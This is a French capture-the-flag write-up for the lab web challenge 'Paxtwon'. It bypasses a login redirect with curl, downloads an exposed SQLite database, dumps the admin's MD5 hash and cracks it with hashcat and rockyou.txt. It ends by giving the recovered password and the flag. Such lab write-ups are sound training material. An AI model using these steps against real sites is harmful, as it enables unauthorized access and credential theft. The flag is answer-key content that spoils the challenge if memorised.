# WRITEUP WEB / PAXTWON
## Consignes :

```
Vous avez été mandaté pour récupérer des informations sur la page d’administration du site web de Paxtwon , une PME.
En effet, Paxtwon souhaite faire un audit de sa fonctionnalité de connexion.
Bonne chance !

http://game1.marshack.fr:42083
```

## Pièce(s)  jointe(s) :

```
Néant
```

## Serveur :
```
Docker
```

## Points attribués :

```
20
```

## Hint :

```

```

## Flag :

```
fl@g{HYkeVkJ2}
```


# writeup

Une fois sur la page web un simple formulaire de connexion apparaît.


![](img-writeup_web_paxtwon/image-01.png)


Si on essaye de se connecter, on tombe sur une redirection.

Le navigateur est redirigé sur index.php. cela nous empêche de voir le contenu de la page d'administration:  **administration.php**

Réalisons une requête avec l'outil curl . Par défaut curl ne suit pas les redirections.

```
 curl -X POST -d "email=test&psswd=test" -s http://game1.marshack.fr:42083/administration.php
```
Résultat:
```
<!DOCTYPE html>
<html>
<head>
<title>ADMINSTRATION PAGE</title>
</head>

<body>
<h1> WELCOME TO THE ADMINISTRATION PAGE </H1>

<div>you are connected on challenge.db<br> <br></div>
PS : La vulnérabilité sur l'accès via l'url à la base de données devrait être fixée très bientôt !.<br> <br>





</body>

</html>

```



On apprend que le nom de la base de données se nomme **challenge.db** et qu'elle est accessible par l’url

On télécharge la base de donnée en saisissant l' url suivante :
```
http://game1.marshack.fr:42083/challenge.db
```

Il s'agit d'un base de donnée sqlite, on utilise le client sqlite3 pour s'y connecter (`apt install sqlite3`)


```
sqlite3 challenge.db                             <== connextion à la base de donnée
SQLite version 3.34.1 2021-01-20 14:10:07
Enter ".help" for usage hints.
sqlite>

sqlite> .tables                                  <== affiche les tables
users

sqlite> select * from users;                     <== affiche les enregistrements de la table users   

1|admin@ESD-challengefox.io|3586784f1998f6c761eea36d84b3b973


sqlite> .quit                                    <== quite sqlite3


```
En parcourant la table users, on relève les éléments suivants : 

- l'adresse email de l'admin :  admin@ESD-challengefox.io
- le mot de passe de l'admin vraisemblablement hashé en md5

maintenant il nous faut déchiffrer le mot de passe grâce à `hashcat` et au fichier `rockyou.txt\.

```
hashcat -m 0 -a 0 "3586784f1998f6c761eea36d84b3b973" rockyou.txt
    hashcat (v6.2.6) starting
    ( ... extrait   )
    Session..........: hashcat
	Status...........: Cracked
	Hash.Mode........: 0 (MD5)
	Hash.Target......: 3586784f1998f6c761eea36d84b3b973
	Time.Started.....: Thu Mar  2 21:29:53 2023 (0 secs)
	Time.Estimated...: Thu Mar  2 21:29:53 2023 (0 secs)
	Kernel.Feature...: Pure Kernel
	Guess.Base.......: File (rockyou.txt)
	Guess.Queue......: 1/1 (100.00%)
	Speed.#1.........:  1572.7 kH/s (0.11ms) @ Accel:256 Loops:1 Thr:1 Vec:8
	Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
	Progress.........: 225280/14344374 (1.57%)
	Rejected.........: 0/225280 (0.00%)
	Restore.Point....: 224256/14344374 (1.56%)
	Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
	Candidate.Engine.: Device Generator
	Candidates.#1....: bossdog -> astone
	Hardware.Mon.#1..: Util: 27%
```

Affichage du mot de passe

```
hashcat -m 0 --show  '3586784f1998f6c761eea36d84b3b973'      
        3586784f1998f6c761eea36d84b3b973:battlestar
```
Résultat:

```
3586784f1998f6c761eea36d84b3b973:battlestar
```

On possède le mot de passe en clair, on peut se connecter au back office.

```
Login: admin@ESD-challengefox.io
mdp : battlestar
```



![](img-writeup_web_paxtwon/image-02.png)


![](img-writeup_web_paxtwon/image-03.png)


Le flag est : **fl@g{HYkeVkJ2}**

<!-- Review Taz : 20230322 -->